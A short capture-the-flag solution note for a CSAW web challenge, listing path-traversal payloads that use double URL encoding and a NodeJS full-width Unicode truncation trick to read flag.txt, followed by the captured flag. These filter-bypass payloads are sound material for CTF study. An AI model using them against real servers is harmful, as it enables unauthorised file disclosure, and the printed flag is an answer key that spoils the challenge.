1. Url encoding twice.
%2e%2e → %252e%252e
http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt
http://web.chal.csaw.io:7311/?path=%252e%2e/flag.txt
2. NodeJS unicode processing failure trick
%ef%bc%ae == %2e (True)
http://web.chal.csaw.io:7311/?path=%ef%bc%ae%2e/flag.txt
http://web.chal.csaw.io:7311/?path=%ef%bc%ae%252e/flag.txt
flag{thank_you_based_orange_for_this_ctf_challenge}
